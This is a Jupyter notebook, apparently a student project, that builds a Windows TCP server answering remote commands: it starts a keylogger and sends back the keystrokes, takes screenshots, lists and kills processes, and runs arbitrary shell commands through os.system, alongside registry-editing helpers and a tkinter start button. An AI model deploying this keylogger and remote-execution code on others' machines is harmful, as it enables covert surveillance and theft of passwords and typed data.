{
 "cells": [
  {
   "cell_type": "code",
   "execution_count": 1,
   "metadata": {},
   "outputs": [
    {
     "output_type": "error",
     "ename": "OSError",
     "evalue": "[WinError 10048] Only one usage of each socket address (protocol/network address/port) is normally permitted",
     "traceback": [
      "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
      "\u001b[1;31mOSError\u001b[0m                                   Traceback (most recent call last)",
      "\u001b[1;32m<ipython-input-1-d3fe0b750285>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[0;32m     97\u001b[0m \u001b[1;31m# create socket\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m     98\u001b[0m \u001b[1;32mwith\u001b[0m \u001b[0msocket\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0msocket\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0msocket\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mAF_INET\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0msocket\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mSOCK_STREAM\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0ms\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m---> 99\u001b[1;33m     \u001b[0ms\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mbind\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mSERVER\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mPORT\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m    100\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    101\u001b[0m     \u001b[1;31m# start socket and wait to connect\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
      "\u001b[1;31mOSError\u001b[0m: [WinError 10048] Only one usage of each socket address (protocol/network address/port) is normally permitted"
     ]
    }
   ],
   "source": [
    "import socket\n",
    "import pickle\n",
    "from boltons import socketutils\n",
    "from pynput import keyboard\n",
    "from PIL import ImageGrab\n",
    "import os\n",
    "import wmi\n",
    "\n",
    "SERVER = \"\"\n",
    "PORT = 1234\n",
    "DELIM = b'\\x00'\n",
    "\n",
    "# dump func\n",
    "def sendDump(buff, var):\n",
    "    dump = pickle.dumps(var)\n",
    "    dump_size = len(dump)\n",
    "\n",
    "    buff.send(str(dump_size).encode() + DELIM)\n",
    "    buff.send(dump)\n",
    "    print(f'\\tSent dump data. Size: {dump_size}')\n",
    "\n",
    "# keylogger func\n",
    "def keylogger_Server(buff):\n",
    "    def on_press(key):\n",
    "        nonlocal string\n",
    "        try:\n",
    "            string += key.char\n",
    "        except AttributeError:\n",
    "            _key = str(key).split('.')[1].upper()\n",
    "\n",
    "            if _key == 'ENTER':\n",
    "                string += f'[{_key}]\\n'\n",
    "            # elif _key == 'SPACE':\n",
    "            #     string += ' '\n",
    "            # elif _key == 'BACKSPACE':\n",
    "            #     string = string[:-1]\n",
    "            else:\n",
    "                string += f'[{_key}]'\n",
    "\n",
    "    print('KEYLOGGER FUNCTION')\n",
    "    string = ''\n",
    "    isHook = False\n",
    "\n",
    "    while True:\n",
    "        flag = buff.recv_until(DELIM).decode()\n",
    "        print(f'\\tReceive: {flag}')\n",
    "        \n",
    "        if flag == 'hook' and not isHook:\n",
    "            listener = keyboard.Listener(on_press = on_press)\n",
    "            listener.start()\n",
    "            isHook = True\n",
    "        elif flag == 'unhook' and isHook:\n",
    "            listener.stop()\n",
    "            isHook = False\n",
    "        elif flag == 'clear':\n",
    "            string = ''\n",
    "        elif flag == 'send':\n",
    "            buff.send(string.encode() + DELIM)\n",
    "        elif flag == 'exit':\n",
    "            if isHook:\n",
    "                listener.stop()\n",
    "            break\n",
    "        \n",
    "# kill process func\n",
    "def getKillProcess(buff):\n",
    "    pid = int(buff.recv_until(DELIM).decode())\n",
    "    print(f'KILL PROCESS {pid}')\n",
    "\n",
    "    try:\n",
    "        os.kill(pid, 9)\n",
    "    except:\n",
    "        print('\\t Err: No process with uid exist')\n",
    "\n",
    "# process list func\n",
    "def sendProcessList(buff):\n",
    "    print('SEND PROCESS LIST')\n",
    "    f = wmi.WMI()\n",
    "\n",
    "    process_data = []\n",
    "    for process in f.Win32_Process([\"ProcessId\", \"Name\", \"ThreadCount\"]):\n",
    "        process_data.append([process.ProcessId, process.Name, process.ThreadCount])\n",
    "\n",
    "    sendDump(buff, process_data)\n",
    "\n",
    "#  screenshot func\n",
    "def sendScreenShot(buff):\n",
    "    print('SEND SCREENSHOT')\n",
    "    image = ImageGrab.grab()\n",
    "    \n",
    "    sendDump(buff, image)\n",
    "\n",
    "#close connection\n",
    "def closeConnection(buff):\n",
    "    print('CLOSE CONNECTION')\n",
    "    buff.close()\n",
    "\n",
    "# create socket\n",
    "with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n",
    "    s.bind((SERVER, PORT))\n",
    "\n",
    "    # start socket and wait to connect\n",
    "    print(\"Starting Server!\")\n",
    "    s.listen()\n",
    "    while True:\n",
    "        conn, addr = s.accept()\n",
    "        print(\"Connected by: \", addr)\n",
    "\n",
    "\n",
    "        buff = socketutils.BufferedSocket(conn, None)\n",
    "        try:\n",
    "            while True:\n",
    "                flag = buff.recv_until(b'!F!').decode()\n",
    "                print(f'Receive: {flag}')\n",
    "                \n",
    "                if flag == 'screenshot':\n",
    "                    sendScreenShot(buff)\n",
    "                elif flag == 'processlist':\n",
    "                    sendProcessList(buff)\n",
    "                elif flag == 'killprocess':\n",
    "                    getKillProcess(buff)\n",
    "                elif flag == 'command':\n",
    "                    getCommand(buff)\n",
    "                elif flag == 'keylogger':\n",
    "                    keylogger_Server(buff)\n",
    "                else:\n",
    "                    closeConnection(buff)\n",
    "                    break\n",
    "        except:\n",
    "            print('Acidently close')\n",
    "            "
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "from winreg import *\n",
    "def getHKEY(name):\n",
    "    if name == \"HKEY_CLASSES_ROOT\":\n",
    "        return HKEY_CLASSES_ROOT\n",
    "    elif name == \"HKEY_CURRENT_USER\":\n",
    "        return HKEY_CURRENT_USER\n",
    "    elif name == \"HKEY_LOCAL_MACHINE\":\n",
    "        return HKEY_LOCAL_MACHINE\n",
    "    elif name == \"HKEY_USERS\":\n",
    "        return HKEY_USERS\n",
    "    elif name == 'HKEY_PERFORMANCE_DATA':\n",
    "        return HKEY_PERFORMANCE_DATA\n",
    "    elif name == 'HKEY_CURRENT_CONFIG':\n",
    "        return HKEY_CURRENT_CONFIG\n",
    "    elif name == 'HKEY_DYN_DATA':\n",
    "        return HKEY_DYN_DATA\n",
    "\n",
    "def getType(type):\n",
    "    if type == 'String':\n",
    "        return REG_SZ\n",
    "    elif type == 'Binary':\n",
    "        return REG_BINARY\n",
    "    elif type == 'DWORD':\n",
    "        return REG_DWORD\n",
    "    elif type == 'QWORD':\n",
    "        return REG_QWORD\n",
    "    elif type == 'Multi-String':\n",
    "        return REG_MULTI_SZ\n",
    "    elif type == 'Expandable String':\n",
    "        return REG_EXPAND_SZ\n",
    "\n",
    "def createKey(key):\n",
    "    hkey, key = key.split('\\\\', 1)\n",
    "    return CreateKeyEx(getHKEY(hkey), key)\n",
    "\n",
    "def deleteKey(key):\n",
    "    hkey, key = key.split('\\\\', 1)\n",
    "    DeleteKey(getHKEY(hkey), key)\n",
    "\n",
    "def getValue(key, valueName):\n",
    "    return QueryValueEx(createKey(key), valueName)\n",
    "\n",
    "def setValue(key, valueName, value, type):\n",
    "    return SetValueEx(createKey(key), valueName, 0, getType(type), value)\n",
    "\n",
    "def deleteValue(key, valueName):\n",
    "    DeleteValue(createKey(key), valueName)\n",
    "\n"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "from _winreg import *\n",
    "\n",
    "def createKey(key):\n",
    "    hkey, key = key.split('\\\\', 1)\n",
    "    return CreateKeyEx(getHKEY(hkey), key)\n",
    "\n",
    "def deleteKey(key):\n",
    "    hkey, key = key.split('\\\\', 1)\n",
    "    DeleteKey(getHKEY(hkey), key)\n",
    "\n",
    "def getValue(key, valueName):\n",
    "    return QueryValueEx(createKey(key), valueName)\n",
    "\n",
    "def setValue(key, valueName, value, type):\n",
    "    return SetValueEx(createKey(key), valueName, 0, getType(type), value)\n",
    "\n",
    "def deleteValue(key, valueName):\n",
    "    DeleteValue(createKey(key), valueName)\n",
    "\n",
    "SetValueEx(createKey(r'HKEY_LOCAL_MACHINE\\SOFTWARE\\Adobe\\test1\\test2'), 'S2', 0, _winreg.REG_MULTI_SZ, [\"Car\", \"Bus\", \"Train\"])"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "setValue(r'HKEY_LOCAL_MACHINE\\SOFTWARE\\Adobe\\test1\\test2', 'test 1', b'ahihi', 'Binary')"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "createKey(r'HKEY_LOCAL_MACHINE\\SOFTWARE\\Adobe\\test1\\test2')"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "deleteKey(r'HKEY_LOCAL_MACHINE\\SOFTWARE\\Adobe\\test1\\test2')"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "deleteValue(r'HKEY_LOCAL_MACHINE\\SOFTWARE\\Adobe\\test1\\test2', 'a')"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "getValue(r'HKEY_LOCAL_MACHINE\\SOFTWARE\\Adobe\\test1\\test2', r'a')"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": []
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": []
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "\n",
    "import ctypes\n",
    "import subprocess\n",
    "import sys\n",
    "import os\n",
    "\n",
    "if os.name == 'nt':\n",
    "\tif not ctypes.windll.shell32.IsUserAnAdmin():\n",
    "\t\tprint('\\nThis script requires to be ran with admin privileges\\n')\n",
    "\t\tsys.exit()\n",
    "\n",
    "if sys.version[0] == '2':\n",
    "\tinput = raw_input\n",
    "\timport _winreg as wreg\n",
    "else:\n",
    "\timport winreg as wreg\n",
    "\n",
    "#create key\n",
    "key = wreg.CreateKey(wreg.HKEY_LOCAL_MACHINE, \"Software\\\\TestCompany\\\\TestProject\")\n",
    "# Create new subkey\n",
    "wreg.SetValue(key, 'NewSubkey', wreg.REG_SZ, 'testsubkey')\n",
    "print(wreg.QueryValue(key, 'NewSubKey'))\n",
    "# prints 'testsubkey'\n",
    "# Create new value\n",
    "wreg.SetValueEx(key, 'ValueName', 0, wreg.REG_SZ, 'testvalue')\n",
    "print(wreg.QueryValueEx(key,'ValueName'))\n",
    "# prints (u'testvalue', 1)\n",
    "key.Close()\n",
    "\n",
    "\n",
    "#read value\n",
    "key = wreg.OpenKey(wreg.HKEY_LOCAL_MACHINE, \"Software\\\\TestCompany\\\\TestProject\",0,wreg.KEY_ALL_ACCESS)\n",
    "wreg.SetValue(key, 'NewSubkey', wreg.REG_SZ, 'subkey_changed')\n",
    "print(wreg.QueryValue(key, 'NewSubkey'))\n",
    "# prints 'subkey_changed'\n",
    "wreg.SetValueEx(key, 'ValueName', 0, wreg.REG_SZ, 'value_changed')\n",
    "print(wreg.QueryValueEx(key, 'ValueName'))\n",
    "key.Close()\n",
    "\n",
    "\n",
    "#loop keys\n",
    "keyVal = r\"Software\"\n",
    "aKey = wreg.OpenKey(wreg.HKEY_LOCAL_MACHINE, keyVal, 0, wreg.KEY_ALL_ACCESS)\n",
    "try:\n",
    "    i = 0;\n",
    "    while True:\n",
    "        asubkey = wreg.EnumKey(aKey, i)\n",
    "        print(asubkey)\n",
    "        i += 1\n",
    "except WindowsError:\n",
    "    pass\n",
    "\n",
    "input('Press Enter')"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": []
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "\n"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": []
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "# vấn đề với hàm cmd\n",
    "def getCommand(buff):\n",
    "    command = (buff.recv_until(DELIM).decode())\n",
    "    print(f'COMMAND {command}')\n",
    "\n",
    "    returnVal = os.system(command)\n",
    "    sendDump(buff, returnVal)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": []
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": []
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": []
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "import subprocess\n",
    "import win32api\n",
    "import win32process\n",
    "\n",
    "\n",
    "#subprocess.Popen('notepad')\n",
    "#win32api.ShellExecute(None, None, \"notepad.exe\", None, None, 5)\n",
    "win32process.CreateProcess(None, \"C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Office16\\\\MSACCESS.EXE\", None, None, 8, win32process.NORMAL_PRIORITY_CLASS, None, None, win32process.STARTUPINFO())"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "import subprocess\n",
    "cmd = 'powershell \"gps | where {$_.MainWindowTitle } | select Description'\n",
    "proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n",
    "for line in proc.stdout:\n",
    "    if line.rstrip():\n",
    "        # only print lines that are not empty\n",
    "        # decode() is necessary to get rid of the binary string (b')\n",
    "        # rstrip() to remove `\\r\\n`\n",
    "        print(line.decode().rstrip())"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": []
  },
  {
   "cell_type": "code",
   "execution_count": 2,
   "metadata": {},
   "outputs": [
    {
     "output_type": "stream",
     "name": "stdout",
     "text": [
      "START SERVER\n",
      "Port: 1234\n",
      "Exception in thread Thread-4:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\Users\\thuan\\Documents\\GitHub\\Socket\\server.py\", line 48, in addConnection\n",
      "    conn, addr = self.server.accept()\n",
      "  File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.9_3.9.1520.0_x64__qbz5n2kfra8p0\\lib\\socket.py\", line 293, in accept\n",
      "    fd, addr = self._accept()\n",
      "OSError: [WinError 10038] An operation was attempted on something that is not a socket\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.9_3.9.1520.0_x64__qbz5n2kfra8p0\\lib\\threading.py\", line 954, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.9_3.9.1520.0_x64__qbz5n2kfra8p0\\lib\\threading.py\", line 892, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"c:\\Users\\thuan\\Documents\\GitHub\\Socket\\server.py\", line 59, in addConnection\n",
      "    self.stopServices()\n",
      "  File \"c:\\Users\\thuan\\Documents\\GitHub\\Socket\\server.py\", line 31, in stopServices\n",
      "    self.server.close()\n",
      "AttributeError: 'NoneType' object has no attribute 'close'\n",
      "STOP SERVER\n",
      "Unexpected error\n",
      "STOP SERVER\n",
      "START SERVER\n",
      "Port: 1234\n",
      "Exception in thread Thread-5:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\Users\\thuan\\Documents\\GitHub\\Socket\\server.py\", line 48, in addConnection\n",
      "    conn, addr = self.server.accept()\n",
      "  File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.9_3.9.1520.0_x64__qbz5n2kfra8p0\\lib\\socket.py\", line 293, in accept\n",
      "    fd, addr = self._accept()\n",
      "OSError: [WinError 10038] An operation was attempted on something that is not a socket\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.9_3.9.1520.0_x64__qbz5n2kfra8p0\\lib\\threading.py\", line 954, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.9_3.9.1520.0_x64__qbz5n2kfra8p0\\lib\\threading.py\", line 892, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"c:\\Users\\thuan\\Documents\\GitHub\\Socket\\server.py\", line 59, in addConnection\n",
      "    self.stopServices()\n",
      "  File \"c:\\Users\\thuan\\Documents\\GitHub\\Socket\\server.py\", line 34, in stopServices\n",
      "    self.server_thread.join()\n",
      "  File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.9_3.9.1520.0_x64__qbz5n2kfra8p0\\lib\\threading.py\", line 1030, in join\n",
      "    raise RuntimeError(\"cannot join current thread\")\n",
      "RuntimeError: cannot join current thread\n",
      "STOP SERVER\n",
      "Unexpected error\n",
      "STOP SERVER\n"
     ]
    }
   ],
   "source": [
    "from tkinter import *\n",
    "from tkinter.messagebox import showerror, showwarning, showinfo, askokcancel\n",
    "import server\n",
    "\n",
    "\n",
    "class Server_GUI:\n",
    "    def __init__(self, master):\n",
    "        self.services = None\n",
    "        self.master = master\n",
    "\n",
    "        self.master.title(\"Server\")\n",
    "        self.master.geometry('200x200')\n",
    "\n",
    "        self.btn_start = Button(self.master, text = \"Start Server\", width = 20, height = 5, command = self.start)\n",
    "        self.btn_start.place(relx = 0.5, rely = 0.5, anchor = CENTER)\n",
    "\n",
    "        self.master.protocol(\"WM_DELETE_WINDOW\", self.on_closing)\n",
    "\n",
    "    def start(self):\n",
    "        if self.services == None:\n",
    "            try:\n",
    "                self.services = server.ServerServices()\n",
    "                self.services.startServices()\n",
    "\n",
    "                self.btn_start.config(text = \"Stop Server\")\n",
    "            except:\n",
    "                print('Cannot create server')\n",
    "                self.services = None\n",
    "        else:\n",
    "            self.services.stopServices()\n",
    "            self.services = None\n",
    "\n",
    "            self.btn_start.config(text = \"Start Server\")\n",
    "\n",
    "    def on_closing(self):\n",
    "        if self.services != None:\n",
    "            if askokcancel(\"Quit\", \"Server is running.\\nDo you want to quit?\"):\n",
    "                self.services.stopServices()\n",
    "            else:\n",
    "                return\n",
    "            \n",
    "        self.master.destroy()\n",
    "\n",
    "            \n",
    "\n",
    "window_server = Tk()\n",
    "Server_GUI(window_server)\n",
    "window_server.mainloop()\n"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": []
  }
 ],
 "metadata": {
  "kernelspec": {
   "name": "python395jvsc74a57bd000172848056bf5a8dce28facb726fe454ad10f3d4266ab9112b81ae2143452f8",
   "display_name": "Python 3.9.5 64-bit ('PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0')"
  },
  "language_info": {
   "name": "python",
   "version": "3.9.5"
  },
  "metadata": {
   "interpreter": {
    "hash": "00172848056bf5a8dce28facb726fe454ad10f3d4266ab9112b81ae2143452f8"
   }
  },
  "orig_nbformat": 2
 },
 "nbformat": 4,
 "nbformat_minor": 2
}